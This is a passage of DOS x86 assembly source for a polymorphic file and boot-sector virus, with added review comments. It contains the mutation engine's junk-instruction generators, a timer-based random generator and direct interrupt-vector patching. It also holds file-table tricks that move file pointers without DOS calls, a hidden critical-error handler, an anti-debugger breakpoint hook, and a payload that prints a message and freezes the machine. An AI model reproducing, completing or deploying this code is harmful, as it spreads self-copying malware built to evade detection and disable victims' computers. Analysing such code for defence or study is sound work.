;Preserve reggies and 8/16 bit
and ax,0011111100000001b
;Or it with addr mode and make it mov
or ax,1100000010001010b
reg_test:
test al,1
jz is_8bit_move_with_reg
;Make source and dest = ax,bx,cx,dx
and ah,11011011b
is_8bit_move_with_reg:
mov bl,ah
and bl,00111000b
;No mov ax, 's please
jz move_with_reg
;Let's see if 2 reggies are same reggies.
mov bh,ah
sal bh,1
sal bh,1
sal bh,1
and bh,00111000b
;Check if reg,reg are same
cmp bh,bl
jz move_with_reg
stosw
ret
;-----------------------------------------------------------------------------
;Modify a mov reg,reg into an xchg reg,reg
;-----------------------------------------------------------------------------
reg_exchange:
;Emit an xchg reg8,reg8 filler instruction.
;Strategy: let move_with_reg emit a mov reg,reg (2 bytes via stosw),
;rewind di over it, then reuse the ModR/M byte it left in ah.
;In:  es:di = output cursor (same convention as the other op generators)
;Out: 2 bytes written at es:di, di advanced by 2
;Clobbers: ax, bh, flags, plus whatever move_with_reg clobbers
;NOTE(review): this relies on move_with_reg leaving al=opcode, ah=ModR/M
;and advancing di by exactly 2 on every return - confirm against its
;definition, which starts above this chunk.
;Make a mov reg,reg
call move_with_reg
;But then remove it
dec di
;And take advantage of the fact the opcode is still in ax
dec di
;Was a 16 bit type? (bit 0 of the mov opcode is the operand-size bit)
test al,1b
;Yeah go for an 8 bitter - retry until move_with_reg yields an 8-bit form
jnz reg_exchange
mov bh,ah
;Is the r/m field (ModR/M bits 0-2) the accumulator?
;(the reg field was already filtered by move_with_reg's "no mov ax" check)
and bh,07h
;Yah so bomb - retry; the generator never exchanges with the accumulator
jz reg_exchange
;Else make it xchg ah,dl etc... 86h = XCHG r/m8,r8; ModR/M kept from the mov
mov al,10000110b
stosw
ret
;-----------------------------------------------------------------------------
;We don't have to watch our stack if we pair up pushes with pops
;so I slapped together this piece of shoddy work to add them.
;-----------------------------------------------------------------------------
do_push_pop:
;Emit one random push/pop pair copied from the bytes_2 table.
;In:  es:di = output cursor
;Out: 2 bytes (push rX / pop rY) written at es:di, di advanced by 2
;Clobbers: ax, bx, flags; get_rnd state advances
;Pick an entry index in 0..(pairs-1); each pair is 2 bytes, so scale by 2.
;rand_in_range divides by this count, so bytes_2 must never be empty.
mov ax,(end_bytes_2-bytes_2)/2
call rand_in_range
add ax,ax
mov bx,ax
;Generate push and pop instruction
;(the table lives in cs:, the generated bytes go to es:di)
mov ax,word ptr cs:[bytes_2+bx]
stosw
ret
;-----------------------------------------------------------------------------
;Generate a random int 21h call.
;-----------------------------------------------------------------------------
do_int_21h:
;Emit a filler "mov ah,fn / int 21h" (4 bytes) or "mov ax,fn / int 21h"
;(5 bytes) sequence at es:di, chosen from ah_table / ax_table.
;In:  es:di = output cursor; reads cs:[prog_type], cs:[decrypt_pointer],
;     cs:[last_int_type]
;Out: bytes emitted and di advanced, or nothing when suppressed
;Clobbers: ax, bx, flags; updates cs:[last_int_type]; get_rnd state advances
;Do not generate int 21h calls into boot sector decryptor
;("B" = boot-sector variant, where DOS services presumably are not up yet)
cmp byte ptr cs:[prog_type],"B"
je no_generate_int
;Do not generate int 21h calls into decryption loop
;NOTE(review): a decrypt_pointer of 2 or more is treated as "inside the
;loop" and suppresses emission; what maintains that counter is not
;visible in this chunk.
cmp byte ptr cs:[decrypt_pointer],02h
jb no_in_loop
no_generate_int:
ret
no_in_loop:
call get_rnd
;Choose within ah,function or ax,function+subfunction
and al,01h
jz do_int_ax
do_int_ah:
;Index 0..entries-1 into the byte table
mov ax,end_ah_table-ah_table
call rand_in_range
mov bx,ax
mov ah,byte ptr cs:[ah_table+bx]
;Do not generate same int's in a row
;(re-draw; terminates because the table holds several distinct values)
cmp ah,byte ptr cs:[last_int_type]
jz do_int_ah
;Generate mov ah,function -> B4 imm8 (al = opcode byte, ah = immediate)
mov byte ptr cs:[last_int_type],ah
mov al,0B4h
stosw
;Generate int 21h -> CD 21 (the word 21CDh stores little-endian as CD 21)
mov ax,021CDh
stosw
ret
do_int_ax:
;Index 0..entries-1 into the word table, scaled by 2
mov ax,(end_ax_table-ax_table)/2
call rand_in_range
add ax,ax
mov bx,ax
mov ax,word ptr cs:[ax_table+bx]
;Do not generate same int's in a row
;(only the function byte in ah is compared, same as the ah path)
cmp ah,byte ptr cs:[last_int_type]
jz do_int_ax
mov byte ptr cs:[last_int_type],ah
;Generate mov ax,function -> B8 imm16: opcode byte first, then the word
mov byte ptr es:[di+00h],0B8h
inc di
stosw
;Generate int 21h
mov ax,021CDh
stosw
ret
;-----------------------------------------------------------------------------
;Simple timer based random numbers but with a twist using xor of last one.
;-----------------------------------------------------------------------------
get_rnd:
;Timer-seeded PRNG: ax = (16-bit read from I/O port 40h) xor previous result.
;Out: ax = new value, also stored back as the next xor operand
;Clobbers: flags
;NOTE: the xor immediate below is NOT 0FFFFh. 'org $-2' backs the location
;counter up so 'Randomize dw 0' overlays the two immediate bytes, and the
;store at the end rewrites them with this call's output. This is
;self-modifying code: the immediate starts at 0 and becomes the previous
;result. The store has no segment override, so it depends on the ASSUME in
;effect / ds == cs at the call site - confirm. Per the author's own note
;on rand_16, the high byte of the result carries little entropy.
in ax,40h
xor ax, 0FFFFh
org $-2
Randomize dw 0000h
mov [Randomize],ax
ret
;-----------------------------------------------------------------------------
;A small variation to compensate for the lack of randomness in the
;high byte of the 16 bit result returned by get_rnd.
;-----------------------------------------------------------------------------
rand_16:
;Build a 16-bit random value from the low bytes of two get_rnd draws.
;Out: ax = (low byte of first draw) << 8 | (low byte of second draw)
;Clobbers: bl (NOT preserved), flags; get_rnd state advances twice
call get_rnd
mov bl,al
call get_rnd
mov ah,bl
ret
;-----------------------------------------------------------------------------
;Generate a random number between 0 and ax-1 (ax must be non-zero).
;-----------------------------------------------------------------------------
rand_in_range:
;Returns a random number in 0..ax-1 (get_rnd modulo ax).
;In:  ax = range; must be non-zero - 'div bx' below raises int 00h on 0
;Out: ax = result; bx and dx preserved
;Clobbers: flags; get_rnd state advances
push bx
push dx
;bx = range (ax's old contents are overwritten by get_rnd anyway)
xchg ax,bx
call get_rnd
;Unsigned 32/16 divide of dx:ax by bx - dx must be zeroed first
xor dx,dx
div bx
;Remainder in dx
xchg ax,dx
pop dx
pop bx
ret
;----------------------------------------------------------------------------
;Return the al vector in es:bx
;----------------------------------------------------------------------------
get_int:
;Read interrupt vector al straight from the IVT at 0000:(al*4).
;In:  al = interrupt number
;Out: es:bx = current handler (segment:offset); ax preserved
;Clobbers: flags
;NOTE(review): no DOS call is involved (int 21h/35h is not used), so any
;hook sitting on the DOS Get Vector service never sees this read.
push ax
;ax = al * 4 (ah is zeroed first, so the two rotates act as a shift)
xor ah,ah
rol ax,1
rol ax,1
xchg bx,ax
xor ax,ax
mov es,ax
les bx,dword ptr es:[bx+00h]
pop ax
ret
;----------------------------------------------------------------------------
;Set al interrupt vector to ds:dx pointer
;----------------------------------------------------------------------------
set_int:
;Write interrupt vector al directly into the IVT at 0000:(al*4).
;In:  al = interrupt number, ds:dx = new handler
;Out: none; ax, bx, ds preserved
;Clobbers: flags
;NOTE(review): the DOS Set Vector service (int 21h/25h) is bypassed; the
;IVT entry is patched in place. The unconditional 'sti' at the end
;enables interrupts even if the caller had them disabled.
push ax
push bx
push ds
;Keep interrupts off while the 4-byte vector is half-written
cli
;ax = al * 4
xor ah,ah
rol ax,1
rol ax,1
xchg ax,bx
;Second push of ds: this copy is the handler segment, consumed by the
;'pop' into the vector's segment word below.
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[bx+00h],dx
pop word ptr ds:[bx+02h]
sti
pop ds
pop bx
pop ax
ret
;----------------------------------------------------------------------------
;Print message to screen
;----------------------------------------------------------------------------
print_credits:
;Payload: switch to text mode 3, print text_birthday through the BIOS
;write-string service, then hang the machine (denial of service).
;In:  cs:text_birthday = message (defined outside this chunk)
;Out: never returns
;NOTE(review): bp is restored from the stack and then text_birthday's
;offset is ADDED to it, so es:bp only points at the string when bp == 0
;on entry (e.g. after zero_all) - confirm at the callers.
;Set VGA video mode 03h
push bp
mov ax,0003h
int 10h
;Print string: int 10h/AH=13h, AL=01h (attribute in bl, move cursor),
;bl=02h attribute, cx=3Ah characters (must match the string length),
;dh=0Ah row, dl=0Bh column, es:bp = string
mov ax,1301h
mov bx,0002h
mov cx,003Ah
mov dx,0A0Bh
push cs
pop es
pop bp
add bp,offset text_birthday
int 10h
exit_print:
;Infinite loop - the host is never resumed
jmp exit_print
;----------------------------------------------------------------------------
;Get sft address in es:di
;----------------------------------------------------------------------------
get_sft:
;Resolve a DOS file handle to its System File Table entry through the
;DOS multiplex interrupt (int 2Fh) internal functions.
;In:  bx = file handle
;Out: CF=0 and es:di = SFT entry on success; CF=1 on error (es:di then
;     holds whatever int 2Fh left). bx preserved on both paths.
;Clobbers: ax, flags
;NOTE(review): 1220h/1216h are undocumented DOS-internal services, so this
;depends on the DOS version; callers must test CF.
;File handle in bx
push bx
;Get job file table entry to es:di
mov ax,1220h
int 2Fh
jc error_sft
;Exit if handle not opened
;(the JFT byte is the SFT index; 0FFh marks an unused handle slot)
xor bx,bx
mov bl,byte ptr es:[di+00h]
cmp bl,0FFh
je error_sft
;Get address of sft entry number bx to es:di
mov ax,1216h
int 2Fh
jc error_sft
pop bx
;stc followed by cmc leaves CF=0 (equivalent to clc): success
stc
cmc
ret
;Exit with error
error_sft:
pop bx
stc
ret
;----------------------------------------------------------------------------
;Seek to end of file
;----------------------------------------------------------------------------
seek_end:
;Move the handle's file position to end-of-file by writing the SFT
;fields directly (no int 21h/42h lseek call is made).
;In:  bx = file handle
;Out: SFT current-position dword (+15h low, +17h high) := file-size dword
;     (+11h low, +13h high)
;Clobbers: ax, dx, es, di, flags
;NOTE(review): the carry flag returned by get_sft is ignored - on failure
;es:di is whatever int 2Fh left behind and the two stores land there.
call get_sft
mov ax,word ptr es:[di+11h]
mov dx,word ptr es:[di+13h]
mov word ptr es:[di+17h],dx
mov word ptr es:[di+15h],ax
ret
;----------------------------------------------------------------------------
;Seek to beginning
;----------------------------------------------------------------------------
seek_begin:
;Reset the handle's file position to 0 by zeroing the SFT current-position
;dword (+15h/+17h) directly, without a DOS seek call.
;In:  bx = file handle
;Out: none
;Clobbers: ax (left 0), es, di, flags
;NOTE(review): as in seek_end, the carry flag from get_sft is not checked.
call get_sft
xor ax,ax
mov word ptr es:[di+17h],ax
mov word ptr es:[di+15h],ax
ret
;----------------------------------------------------------------------------
;Virus CRITICAL ERROR interrupt handler
;----------------------------------------------------------------------------
my_int24h:
;Replacement critical-error (int 24h) handler; the original vector is put
;back by unhook_ints. Suppresses the "Abort, Retry, Fail?" prompt that a
;failing disk access would otherwise raise while files are being touched.
;Out: al = 3, the int 24h return code for "fail the DOS call"
;NOTE(review): interrupts are re-enabled with sti before the iret.
sti
;Return error in function
mov al,3
iret
;----------------------------------------------------------------------------
;Save all registers in the stack
;----------------------------------------------------------------------------
push_all:
;Save flags and all general/segment registers on the caller's stack and
;return with them still pushed (pair with pop_all).
;Implementation: the return address is moved into cs:[ret_off], the
;registers are pushed, then the return address is pushed back for 'ret'.
;Push order: flags, ax, bx, cx, dx, bp, si, di, es, ds - pop_all must pop
;in exactly the reverse order.
;NOTE(review): pushf runs after cli, so the saved flags image always has
;IF=0. ret_off is a single global slot, so this is not re-entrant; the
;cli/sti window only shields it from maskable interrupts.
cli
pop cs:[ret_off]
pushf
push ax
push bx
push cx
push dx
push bp
push si
push di
push es
push ds
push cs:[ret_off]
sti
ret
;----------------------------------------------------------------------------
;Restore all registers from the stack
;----------------------------------------------------------------------------
pop_all:
;Restore everything push_all saved; the caller's stack must hold exactly
;push_all's layout under the return address.
;Pop order: ds, es, di, si, bp, dx, cx, bx, ax, flags (reverse of push_all).
;NOTE(review): popf restores the image push_all took after its cli (IF=0),
;and the trailing sti then enables interrupts unconditionally - so the
;caller's original IF state is never actually restored. Shares the single
;cs:[ret_off] slot with push_all; not re-entrant.
cli
pop cs:[ret_off]
pop ds
pop es
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
popf
push cs:[ret_off]
sti
ret
;----------------------------------------------------------------------------
;Clear some registers before returning to host
;----------------------------------------------------------------------------
zero_all:
;Zero ax, bx, cx, dx, di, si and bp before control goes back to the host,
;so the host does not see the virus' working values. Segment registers
;and sp are left alone.
;Clobbers: flags
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor di,di
xor si,si
xor bp,bp
ret
;----------------------------------------------------------------------------
;Unhook int 03h and int 24h and clear dos infection switch
;----------------------------------------------------------------------------
unhook_ints:
;Put the saved int 03h and int 24h vectors back and set running_sw to "R".
;In:  cs:[old03h], cs:[old24h] = vectors saved when they were hooked
;     (the hooking code is outside this chunk)
;Out: none; ax, dx, ds preserved
;Clobbers: flags; cs:[running_sw] := "R"
;NOTE(review): int 03h is the debugger breakpoint vector - hooking it is
;presumably an anti-debugging measure; int 24h is the critical-error
;handler replaced by my_int24h. The header calls this "clear dos
;infection switch"; the visible effect is only the byte write below.
push ds
push dx
push ax
mov byte ptr cs:[running_sw],"R"
;set_int takes the handler in ds:dx and the vector number in al
lds dx,dword ptr cs:[old03h]
mov al,03h
call set_int
lds dx,dword ptr cs:[old24h]
mov al,24h
call set_int
pop ax
pop dx
pop ds
ret
;----------------------------------------------------------------------------
;Get position of code inserted into boot sector
;----------------------------------------------------------------------------
get_position:
;Locate the inserted code inside a boot sector image.
;In:  es:bx = sector buffer
;Out: di = bx + 2 + zero-extended byte at es:[bx+1]
;Clobbers: ax, flags
;NOTE(review): this looks like decoding a short jump (EB disp8) at the start
;of the sector: target = next instruction (bx+2) + displacement. The
;displacement is zero-extended (mov ah,0), so only forward jumps (disp <
;80h) resolve correctly - confirm against the code that writes the sector.
mov ah,0
mov al,byte ptr es:[bx+01h]
inc ax
inc ax
mov di,bx
add di,ax
ret
;----------------------------------------------------------------------------
;Make a copy of file header
;----------------------------------------------------------------------------
copy_header:
;Copy the first 19h (25) bytes of file_buffer into old_header.
;In:  ds:file_buffer = header bytes to keep. The source is read via ds:si
;     while file_buffer is a cs-relative offset, so this presumes ds == cs
;     at the call site - confirm at the callers.
;Out: cs:old_header updated; registers and flags restored by pop_all
;     (IF is left enabled, see pop_all)
;Clobbers: cs:[ret_off] through push_all/pop_all
;Copy header to buffer
call push_all
;es = cs for the destination
push cs
pop es
mov si,offset file_buffer
mov di,offset old_header
mov cx,0019h
cld
rep movsb
call pop_all
ret
;----------------------------------------------------------------------------
;Polymorphic generator data buffer
;----------------------------------------------------------------------------
ah_table:
;This table contains the int 21h garbage functions
;Filler functions for do_int_21h's "mov ah,fn / int 21h" path: query-type
;calls with no lasting effect. do_int_21h indexes this table by byte, so
;every entry must stay exactly one byte, and it re-draws while the pick
;equals last_int_type, so the table must keep more than one distinct value.
db 00Bh ;Read entry state
db 019h ;Get current drive
db 02Ah ;Get current date
db 02Ch ;Get current time
db 030h ;Get dos version number
db 062h ;Get psp address
end_ah_table:
ax_table:
;Function/subfunction pairs for the "mov ax,fn / int 21h" path; indexed
;by word, so every entry must stay exactly one dw. Only the high byte (ah)
;is compared against last_int_type.
dw 3300h ;Get break-flag
dw 3700h ;Get line-command separator
dw 5800h ;Get mem concept
dw 5802h ;Get umb insert
dw 6501h ;Get code-page
end_ax_table:
;Push and pop pairs
bytes_2:
;Seven push/pop pairs assembled in place as 2-byte opcodes. do_push_pop
;copies one pair as a word, so each entry must stay exactly 2 bytes and
;(end_bytes_2-bytes_2)/2 is the entry count it randomizes over.
;Each pair copies one register into another with no net stack change.
push ax
pop dx
push ax
pop bx
push ax
pop cx
push bx
pop dx
push bx
pop cx
push cx
pop bx
push cx
pop dx
end_bytes_2:
;Steps table
step_table:
;Dispatch tables of near offsets used by the generator. The targets of
;the first two tables are defined outside this chunk, and the code that
;indexes them is not visible here.
dw offset do_subroutine
dw offset do_call_garbage
dw offset g_generator
dw offset do_branch
dw offset sub_decryptor
dw offset next_decryptor
dw offset do_push_g_pop
end_step_table:
instruction_table:
;One entry per decryptor-instruction emitter (ordering presumably matters
;to whatever walks this table - confirm there).
dw offset inst_get_delta
dw offset inst_load_counter
dw offset inst_load_pointer
dw offset inst_decrypt_one
dw offset inst_inc_pointer
dw offset inst_dec_loop
end_inst_table:
;Address of every op-code generator
op_table:
;Filler-instruction generators. reg_exchange, do_push_pop and do_int_21h
;are defined in this section; move_with_reg starts above it; move_imm is
;not visible here.
dw offset move_with_reg
dw offset move_imm
dw offset reg_exchange
dw offset do_push_pop
;NOTE(review): written without 'offset' unlike its siblings. For a near
;code label MASM stores the offset either way, so the bytes match, but
;this should be normalized for consistency.
dw do_int_21h
end_op_table:
;Misc data
;Generator state. Of these, this section only touches last_int_type
;(written by do_int_21h to avoid emitting the same function twice in a row)
;and decrypt_pointer (read by do_int_21h: a value of 2 or more suppresses
;int 21h filler). The remaining fields are maintained by code outside
;this chunk.
last_fill_type dw 0
last_int_type db 0
last_step_type dw 0000h
last_subroutine dw 0000h
decrypt_sub dw 0000h
address_loop dw 0000h
decrypt_pointer db 00h
address_register db 00h
decrypt_register db 00h
address_seg_1 db 00h
address_seg_2 db 00h
;----------------------------------------------------------------------------
;Virus data buffer
;----------------------------------------------------------------------------
;Saved interrupt vectors: each 'equ this dword' aliases the following
;offset/segment word pair so it can be loaded with lds/les in one go.
;old03h and old24h are restored by unhook_ints; the others are not used
;in this section.
old21h equ this dword
old21h_off dw 0000h
old21h_seg dw 0000h
org21h equ this dword
org21h_off dw 0000h
org21h_seg dw 0000h
old13h equ this dword
old13h_off dw 0000h
old13h_seg dw 0000h
old24h equ this dword
old24h_off dw 0000h
old24h_seg dw 0000h
old03h equ this dword
old03h_off dw 0000h
old03h_seg dw 0000h
read_ptr equ this dword
read_off dw 0000h
read_seg dw 0000h
dos_flag db 00h
;"C" = COM/file variant, "B" = boot-sector variant (do_int_21h tests for "B")
prog_type db "C"
;Set to "R" by unhook_ints; the other value(s) are assigned elsewhere
running_sw db "R"
stealth_sw db 00h
dos_function dw 0000h
;Scratch slot for the return address in push_all/pop_all (single, global)
ret_off dw 0000h
today db 00h